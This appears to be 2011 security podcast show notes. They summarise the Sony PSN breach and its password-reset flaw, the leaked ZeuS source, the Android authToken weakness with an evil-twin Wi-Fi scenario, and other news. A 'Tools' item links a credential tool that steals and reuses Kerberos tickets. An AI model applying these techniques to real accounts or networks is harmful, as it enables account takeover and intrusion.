It’s not surprising that many Turkish people are distrustful of the BTK’s new measures. The country has a history of Internet censorship, famously blocking YouTube in 2007 due to a video that was deemed insulting to the founder of modern Turkey. That ban has been lifted, but thousands of other sites remain blocked.

Source:http://mashable.com/2011/05/17/sony-games-psn/

Twenty-eight days. That’s how long Sony’s PlayStation Network was down after hacker attacks caused a serious privacy breach and a lot of headaches for the company. Now, Sony wants to redeem itself by giving away two PS3 or two PSP games, as well as a number of other freebies, to PSN customers.

As the PlayStation Network comes back online, Sony isoffering a package of free goods and services to all existing registered PlayStation Network and Qriocity users in the U.S. and Canada. This campaign to woo customers is dubbed “Welcome Back.”

The package, available for 30 days after the PlayStation Store is restored, consists of two PS3 games that can be kept forever. Customers can choose from Dead Nation, inFAMOUS, LittleBigPlanet, Super Stardust HD and Wipeout HD + Fury.

PSP owners will be able to download two of these games: LittleBigPlanet (PSP), ModNation Racers, Pursuit Force and Killzone Liberation.

Sony will also offer a selection of free movie rentals, a 30-day free PlayStation Plus membership for non-PlayStation Plus subscribers (and an additional 60 days free for existing PlayStation Plus subscribers), as well as an additional 30 days of free premium subscription for existing Music Unlimited Premium Trial subscription members (and an additional 30 days plus time lost for existing Premium/Basic members).

Finally, PlayStation Home will be offering 100 free virtual items, with additional free content to be released soon.

For customers outside the U.S. and Canada, the “Welcome Back” bag of free goodies from Sony is similar but slightly different for each country. For more info, check out theEuropean andLatin American PlayStation Network blogs.

Geordy’s comments: Someone in the comments pointed out that Sony is also offering free identity protection for a year although I can’t find the reference anywhere.  If you take close notice, they are also playing an angle by offering 30 days of free PlayStation Plus membership to those who don’t already subscribe to PlayStation Plus.  I wonder if it will be one of those auto bill things…

Source:http://www.osnews.com/story/24757/New_Exploit_in_PSN_Sony_Takes_Change-password_Sites_Offline

Like the B-movie that keeps pumping out sequels long after running it’s course, Sony continually finds innovative new ways to fail at security.

Sony just restarted its Playstation Network, after the massive security fail dismissed as a 'hiccup' by Sony CEO Howard Stringer. Well, the PSN has barely been up two days, and a massive security oversight has already been discovered. Yes, Sony just got Sony'd. Again. Unbelievable.

This is just unbelievable. You may recall that as part of the PSN's relaunch, Sony released a new firmware version that forced you to change your password as an additional security measure. The problem is that before the first massive security fail, if you had honestly forgotten your password, you could create a new password by going to a Sony website and entering your email address and date of birth. Nothing special, and this site was still working just fine after PSN's relaunch to aid people in changing their passwords.

Until you realise that your email address and date of birth were among the leaked information. This means that hackers can simply go to the change-password website, enter your email address and date of birth form the stolen data, et voilà, your account has just been re-exploited. It doesn't matter if you have already changed your password following the recent firmware release.

Nyleveia discovered the exploit, and confirmed that it does, indeed, work. They contacted Sony immediately, and sure enough, the web-based change-password function was taken offline by Sony shortly after. Remember that the change-password functionality on the PS3 itself is still working just fine, since it cannot be used for the exploit.

"Unfortunately this also means that those who are still trying to change their password via Playstation.com or Qriocity.com will be unable to do so for the time being," Sony told EuroGamer, "This is due to essential maintenance and at present it is unclear how long this will take. In the meantime you will still be able to sign into PSN via your PlayStation 3 and PSP devices to connect to game services and view Trophy/Friends information."
No system is ever safe, huh, Stringer? It was just a hiccup, huh, Stringer? I'm no security expert, but I'm starting to a structural problem here.

Update: The problem has been fixed.  http://blog.us.playstation.com/2011/05/18/update-on-psn-password-reset-process/

Source: http://shape-of-code.coding-guidelines.com/2011/05/11/fingerprinting-the-author-of-the-zeus-botnet/

The source code of the ZeuS Botnet is now available for download. I imagine there are a few organizations who would like to talk to the author(s) of this code.

All developers have coding habits, that is they usually have a particular way of writing each coding construct. Different developers have different sets of habits and sometimes individual developers have a way of writing some language construct that is rarely used by other developers. Are developer habits sufficiently unique that they can be used to identify individuals from their code? I don’t have enough data to answer that question. Reading through the C++ source of ZeuS I spotted a few unusual usage patterns (I don’t know enough about common usage patterns in PHP to say much about this source) which readers might like to look for in code they encounter, perhaps putting name to the author of this code.

The source is written in C++ (32.5 KLOC of client source) and PHP (7.5KLOC of server source) and is of high quality (the C++ code could do with more comments, say to the level given in the PHP code), many companies could increase the quality of their code by following the coding standard that this author seems to be following. The source is well laid out and there are plenty of meaningful variable names.

So what can we tell about the person(s) who wrote this code?

• There is one author; this is based on consistent usage patterns and nothing jumping out at me as being sufficiently different that it could be written by somebody else.
• The author is fluent in English; based on the fact that I did not spot any identifiers spelled using unusual word combinations that often occur when a developer has a poor grasp of English. Update 16-May: skier.su spotted four instances of the debug message “Request sended.” which suggests the author is not as fluent as I first thought.
• The author is not a newbie developer, perhaps sometime in the past they were badly bitten by a Microsoft C++ compiler bug, found that this usage worked around the problem and have used it ever since.
• (see original article for a much deeper analysis -geordy)

Could the source have been processed by an code formatter to remove fingerprint information? I think not. There are small inconsistencies in layout here and there that suggest human error, also automatic layout tends to have a ‘template’ look to it that this code does not have.
Update 16 May: One source file stands out as being the only one that does not make extensive use of camelCase and a quick search finds that it is derived from the ucl compression library.

Source:  http://csrc.nist.gov/publications/nistpubs/800-61-rev1/SP800-61rev1.pdf

NIST has released Special Publication 800-61 Rev 1.  Computer Security Incident Handling Guide.  Here’s a short excerpt from this 147 page guide that fairly well explains what it’s about:

Computer security incident response has become an important component of IT programs. Security-related threats have become not only more numerous and diverse but also more damaging and disruptive. New types of security-related incidents emerge frequently. Preventative activities based on the results of risk assessments can lower the number of incidents, but not all incidents can be prevented. An incident response capability is therefore necessary for rapidly detecting incidents, minimizing loss and destruction, mitigating the weaknesses that were exploited, and restoring computing services. To that end, this publication provides guidelines for incident handling, particularly for analyzing incident-related data and determining the appropriate response to each incident. The guidelines can be followed independently of particular hardware platforms, operating systems, protocols, or applications.

Because performing incident response effectively is a complex undertaking, establishing a successful incident response capability requires substantial planning and resources. Continually monitoring threats through intrusion detection and prevention systems and other mechanisms is essential. Establishing clear procedures for assessing the current and potential business impact of incidents is critical, as is implementing effective methods of collecting, analyzing, and reporting data. Building relationships and establishing suitable means of communication with other internal groups (e.g., human resources, legal) and with external groups (e.g., other incident response teams, law enforcement) are also vital.

This publication seeks to help both established and newly formed incident response teams. This document assists organizations in establishing computer security incident response capabilities and handling incidents efficiently and effectively. More specifically, this document discusses the following items:

Organizing a computer security incident response capability
– Establishing incident response policies and procedures
– Structuring an incident response team, including outsourcing considerations
– Recognizing which additional personnel may be called on to participate in incident response.

Handling incidents from initial preparation through the post-incident lessons learned phase

Handling specific types of incidents
– Denial of Service (DoS)—an attack that prevents or impairs the authorized use of networks, systems, or applications by exhausting resources
– Malicious Code—a virus, worm, Trojan horse, or other code-based malicious entity that successfully infects a host
– Unauthorized Access—a person gains logical or physical access without permission to a network, system, application, data, or other IT resource
– Inappropriate Usage—a person violates acceptable use of any network or computer policies
– Multiple Component—a single incident that encompasses two or more incidents; for example, a malicious code infection leads to unauthorized access to a host, which is then used to gain unauthorized access to additional hosts.

My Hard Drive Died
5-Day Data Recovery Expert Certification
Where: Atlanta, Georgia
When: June 6-10, 2011

5-Day Bootcamp Data Recovery
Where: Chicago, Illinois
When: July 18-22, 2011

#BSidesCT
Where: Meriden, Connecticut
When: June 11, 2011
http://bsidesct.eventbrite.com

eXcon
Where: Meriden, Connecticut
When: June 11-12, 2011
http://excon.eventbrite.com  (email excon@nesit.net for more info)
Begins after BSidesCT Registration cost is $50.00

#BSidesVienna
When: June 18, 2011
Where: Vienna, Austria
http://www.bsidesvienna.com
CFP now closed!

2nd Annual AIDE conference
When: July 11th – 15th, 2011
Where: Marshall University Forensic Science Center, Huntington, WV
http://aide.marshall.edu/

OISF July Anniversary Event
When: July 16th, 2011
Where: Dayton, Ohio
http://ohioinfosec.org
Adrian Will be there

#BruCon
When: Sept 19-22, 2011
Where: Brussels, Belgium
http://blog.brucon.org/2011/02/confirmation-of-brucon-dates.html
CFP Closed!

@DerbyCon
When: September 30th – October 2, 2011
Where: Louisville, KY
http://www.derbycon.com/

2011 Fall Information Security Conference
When:  November 8 – 9, 2011
Where: Atlanta, GA (Loudermilk Conference Center)
http://www.gaissa.org
CFP open now through June 3, 2011! Email submissions to Conference@gaissa.org

EFF:
The ISD Podcast has entered entered into a contest to see who can raise the most money for the Electronic Frontier Foundation.  For those who don’t know, the EFF is a non-profit group of lawyers, policy analysts, activists, and technologists who fight for digital rights and have helped countless hackers and security researchers get out of hot water as well as exposing injustices caused by ignorant legislation and bad judgements.  Please click the following link to donate to a vitally important cause:
http://action.eff.org/site/TR/Contest/Advocacy?team_id=1730&pg=team&fr_id=1060

Stories

Source: http://www.theregister.co.uk/2011/05/16/android_impersonation_attacks/

The vast majority of devices running Google's Android operating system are vulnerable to attacks that allow adversaries to steal the digital credentials used to access calendars, contacts, and other sensitive data stored on the search giant's servers, university researchers have warned.

The weakness stems from the improper implementation of an authentication protocol known as ClientLogin in Android versions 2.3.3 and earlier, the researchers from Germany's University of Ulm said. After a user submits valid credentials for Google Calendar, Twitter, Facebook, or several other accounts, the programming interface retrieves an authentication token that is sent in cleartext. Because the authToken can be used for up to 14 days in any subsequent requests on the service, attackers can exploit them to gain unauthorized access to accounts.“We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis,” the researchers in the university's Institute of Media Informatics wrote on Friday. “The short answer is: Yes, it is possible, and it is quite easy to do so.”

The findings build off previous findings of Rice University professor Dan Wallach, who in February uncovered the Android privacy shortcomings during a simple exercise for his undergraduate security class. The attacks can only be carried out when the devices are using unsecured networks, such as those offered at Wi-Fi hotspots.

Google patched the security hole earlier this month with the release of Android 2.3.4, although that version, and possibly Android 3, still cause devices synchronizing with Picasa web albums to transmit sensitive data through unencrypted channels, the researchers said. Based on Google's own statistics, this means more than 99 percent of Android-based handsets are vulnerable to the attacks, which are similar in difficulty and effect to so-called sidejacking exploits that steal authentication cookies.

A Google spokesman said the company's Android team is aware of the Picasa deficiencies and is working on a fix.

Researchers Bastian Könings, Jens Nickels, and Florian Schaub warned that the weaknesses could be used against people who use their Android devices on networks under the control of an attacker.

“To collect such authTokens on a large scale an adversary could setup a wifi access point with a common SSID (evil twin) of an unencrypted wireless network, e.g., T-Mobile, attwifi, starbucks,” they wrote. “With default settings, Android phones automatically connect to a previously known network and many apps will attempt syncing immediately. While syncing would fail (unless the adversary forwards the requests), the adversary would capture authTokens for each service that attempted syncing.”

Apps that use ClientLogin should immediately start doing so over encrypted, https channels, the researchers said. A more robust authentication protocol known as oAuth will also close the authToken capture vulnerability, although https should still be used to prevent synced data from being intercepted.

The researchers also suggested Google improve its security by shortening the length of time authTokens are valid and rejecting ClientLogin requests from insecure http connections. With more than 99 percent of carriers offering their users Android versions with known security weaknesses, the report demonstrates how little success Google has had in getting its partners to upgrade to the latest versions. Many Verizon Wireless customers, for instance, remain stuck with Android 2.2.2, despite containing vulnerabilities that have been known about for months.
Last week, Google said it planned to work more closely with wireless carriers in an attempt to help them offer Android updates more quickly. The company has yet to offer details. A Verizon spokeswoman told The Register she couldn't say when the company will provide customers with an updated version of Android. She said users should consider using their devices only on secured networks.

Source: http://www.bangkokpost.com/tech/computer/237244/square-enix-customer-data-leaked-after-sony-problems

Japanese game developer Square Enix Holdings said email addresses of 25,000 customers as well as resumes of 250 job applicants were leaked after a hacker attack against its European subsidiary.

Hackers accessed theEidosmontreal.com website, managed by London-based Square Enix Ltd, as well as other product sites, said a statement from the group released late Saturday.

The news came as Sony's game and Internet services were pulled down after hackers staged one of the biggest data breaches since the advent of the Internet, including the theft of personal customer data.

Square Enix Holdings, creator of mega hits such as Final Fantasy and the Dragon Quest series, took the sites offline to increase security, before resuming services.

Tools:  http://www.ampliasecurity.com/research/wce_v1_2.tgz

WCE has been updated to version 1.2.  The new update allows you to steal kerberos tickets from a Windows box, and then inject those same tickets into another Windows box or unix box. You can use these tickets to access other systems.

This is the equivalent of NTLM pass-the-hash but for Kerberos.

Source:http://networkeffect.allthingsd.com/20110516/proposed-law-would-require-social-networks-to-be-private-by-default/

A proposed California law could significantly change the way social networks operate by forcing them to step up their privacy settings.

Facebook and other Internet companies oppose the proposal, which was put forward by California Senate Majority Leader Ellen Corbett (D-San Leandro) and last week made it out of committee.

The proposed law, SB 242, would require social networks to do the following for California users:

Establish default settings that prohibit the public or private display of anything other than a user’s name and city without their consent.

Require new users to pick privacy settings during the registration process.

Write their privacy options “in plain language” and display them in an “easy-to-use format.”
Remove personally identifying information, including photos, within 48 hours of a user’s request.

Pay up to $10,000 each time they fail to do any of this. A previous version of the bill applied to children under 18, but a revision earlier this month made it much broader. It was approved by the Senate Judiciary Committee last week. Corbett’s pitch is this: “You shouldn’t have to sign in and give up your personal information before you get to the part where you say, ‘Please don’t share my personal information.’”

Facebook and other Internet companies don’t like the bill, and industry groups such as the Internet Alliance and NetChoice have spoken out against it. They argue that such tightened privacy restrictions and regulatory oversight could hamstring social networks’ ability to provide valuable and safe experiences to users.

For instance, if the default settings are all private, it could be hard for new members to get value out of the sites because they won’t be found by other users. Other opponents argue that this should be a national issue, not a state one.

Facebook spokesman Andrew Noyes gave this statement to the San Francisco Chronicle:
Any legislative or regulatory proposal must honor users’ expectations in the contexts in which they use online services and promote the innovation that fuels the growth of the Internet economy. This legislation is a serious threat both to Facebook’s business in California and to meaningful California consumers’ choices about use of personal data.
Majority Leader Corbett is further accusing Facebook of secretly lobbying against the bill without disclosing its identity. (Sound familiar?) We’ve asked Noyes for clarification on this issue.

Update: Noyes replied: “We’re confused by the claim raised in the SF Chron story that Facebook is involved in some kind of “stealth” campaign to kill SB 242 when, as the article acknowledges, we met face-to-face with the bill’s author and every other member of the Senate Judiciary Committee to express our concerns.”

Source:http://thehill.com/blogs/hillicon-valley/technology/161401-fcc-shifts-cybersecurity-focus-to-small-businesses

Small businesses must do more to safeguard their networks, intellectual property and customers' personal data, according to experts at the Federal Communications Commission's Monday roundtable on cybersecurity.

FCC Chairman Julius Genachowski convened the roundtable to discuss the importance of small and medium-sized businesses protecting their computer systems from hackers and outside attacks in the light of several high-profile data breaches in recent weeks at major technology firms.

Breaches at the digital marketing firm Epsilon and two gaming networks owned by Sony have helped cybersecurity return to the headlines, even as the White House released its first legislative guidance on the issue last week.

Speaking with The Hill after the event, Genachowski said that while the challenges facing small firms online are very real, the FCC has outlined a series of easy steps they can take to minimize their risk.

"It's readily available, low-hanging fruit when it comes to cybersecurity planning for the country," Genachowski said, pointing out that half of small businesses don't currently have network security plans in place.

"It's about taking the best practices, basic ideas that are widely accepted and making sure that they're communicated to small businesses."

Genachowski pointed to a recent study by the security firm Symantec that found almost three-fourths of small and medium-sized businesses reported suffering a cyber-attack in the past year, resulting in billions of dollars in lost revenue. He said the average attack costs a firm almost $200,000.

"Small businesses also often struggle to protect the confidential data of their customers. 42 percent of small and medium businesses surveyed reported the loss of confidential or private data in the past 12 months and 40 percent experienced direct financial costs as a result," Genachowski said, "and almost half of small businesses don’t back up their data."
Maurice Jones, chief executive officer of the Washington-area Parkinson Construction Co., described how his firm was compromised by a phishing attack that obtained login and password information for its bank accounts.

Jones said his firm later realized it was missing a significant amount of money from its accounts. By working with banks, Jones said his company was able to recoup some of the lost funds, but not all.

Still, he maintained that broadband access to the Web is vital for the company to remain competitive, since it cuts the number of administrative employees needed by almost half.

Former Secretary of Homeland Security Michael Chertoff said that while it is crucial to manage the amount of risk from cyber-attacks, no plan will completely eliminate the risk of an intrusion.

Chertoff said the only way to do that would be to abandon the network and the benefits it provides. Instead, he said small firms must strike a "realistic balance" depending on their individual concerns.

The commission released a tipsheet on Monday aimed at helping small businesses identify 10 easy steps they can take to reduce the risk of an attack. The steps include training employees in security principles, downloading and installing software updates, installing a firewall for Web connections and limiting the amount of physical and administrative access that employees have to the firm's computers.

Phyllis Schneck, public center chief technology officer for the security firm McAfee, highlighted securing physical access to network infrastructure as crucial, as some of the largest data breaches have been caused by USB flash drives containing malware. She also emphasized the importance of making users regularly change their network passwords.

Another White House announcement on an international plan of cooperation on cybersecurity issues is expected Monday afternoon. Genachowski said he will be participating, but declined to elaborate on details of the event.

Source:http://www.securitymanagement.com/news/facebook-adds-new-security-measures-008552

Facebook announced several security enhancements last week including a new two-factor authentication system and a partnership with a service that can help users avoid clicking on risky or malicious links.
With the optional new Login Approvals service, users will be required to enter an additional code, sent to them via text message, when logging in from a new or unrecognized computer or device. Once the code is entered, users then have the option to save the device to their account so that it no longer requires additional authentication, according to a Facebook blog announcing the new measures.
Users will also see when attempts have been made to access their account from an unrecognized device, but no code was entered, according to the post. If users don’t recognize the login attempt, they’ll be able to change their password “with the knowledge that while someone else may have known [the] login credentials, he or she was unable to access your account.” Login Approvals can be enabled through the “Account Security” section of the account settings page, according to the post.
One aim of the new service was to balance security and usability, according to a separate Facebook blog post. Two-factor authentication sometimes requires users to download applications or to purchase physical tokens, it states. “These are good approaches, and we're considering incorporating them in the future, but they require a lot from the user before being able to turn on the feature. To have the biggest impact and provide this added security to the most people, we decided on SMS.”
Facebook also announced a partnership with Web of Trust (WOT), which ranks Web sites based on feedback provided by WOT community members. The tool, which contains rankings of millions of sites, can help reduce the risk of phishing, spam, scams, and other threats, according to the Facebook post announcing the security enhancements.
Facebook already has a system that automatically scans links to determine whether the Web sites associated with the links are “spammy” or contain malware, according to the post. In the coming months, the company will “increase [its] coverage even more by working with other industry leaders.”

Source:http://www.timescolonist.com/Internet+attack+files+sent+RCMP/4784705/story.html

Details of the cyberattack that choked thousands of websites hosted byIslandnet.com are now in the hands of the RCMP.

Mark Morley, who ownsIslandnet.com with brother Steve Morley, said Friday he has reported the attack to West Shore RCMP.

An email Thursday afternoon to the Internet service provider claimed responsibility for the attack, demanding that a particular website be taken down. That website was removed and the sender followed up with another email stating the attacks had ceased.

The RCMP have opened a case file and are referring the matter to their own technical specialists, Mark Morley said.